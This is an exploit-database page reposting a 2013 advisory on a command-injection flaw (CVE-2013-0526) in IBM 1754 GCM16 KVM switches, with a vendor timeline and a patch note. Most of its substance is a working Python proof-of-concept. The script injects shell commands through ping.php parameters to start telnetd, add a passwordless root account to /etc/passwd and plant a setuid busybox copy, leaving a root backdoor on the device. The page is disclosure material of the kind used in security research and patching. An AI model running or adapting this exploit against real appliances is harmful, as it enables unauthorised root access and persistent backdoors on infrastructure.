0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IBM 1754 GCM16 1.18.0.22011 Command Execution Vulnerability
Author
Risk
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
I. Product description The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. II. Vulnerability information Impact: Command execution Remotely exploitable: yes CVE: 2013-0526 CVS Score: 8.5 III. Vulnerability details GCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw that allows a remote authenticated user to execute unauthorized commands as root. This flaw exist because webapp variables are not sanitised. In this case, parameters $count and $size from ping.php allow to create a special crafted URL to inject text to an exec() so it can be arbitrary used to execute any command on the KVM embedded linux. IV. Proof of concept Following is a simple exploit that lead to root access to the device, opening a telnet and creating a new user with root permission without password (sessid and target are hardcoded so it must be changed to work): #!/usr/bin/python """ This exploit for Avocent KVM switch allows to gain root access to embedded device. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su - superb" to gain root """ from StringIO import StringIO import pycurl import re sessid = "XXXXXXXXX" target = "https://ip.of.kvm/ping.php" <https://172.30.30.40/ping.php> command = "/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd ; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to device using telnet with user target and pass target, then \"/tmp/su - superb\"" storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, target) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1 ; echo *E* ; ' + command + ' ; echo *E*') c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: c.perform() c.close() except: print "" content = storage.getvalue() x1 = re.search(r"\*E\*(.*)\*E\*",content) print x1.group(1).replace("<br />","\n") V. Vendor Response IBM released a new firmware that corrects this vulnerability (1.20.0.22575) VI. Timeline 2013-06-12 - Vendor (IBM PSIRT) notified. 2013-06-12 - Vendor assigns internal ID. 2013-07-02 - Vendor confirms the vulnerability. 2013-08-16 - Vulnerability disclosed and patch released. VII. External information Information about this vulnerability (in spanish): http://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509 -- -- Alejandro Alvarez Bravo alex.a.bravo@gmail.com # 0day.today [2024-07-08] #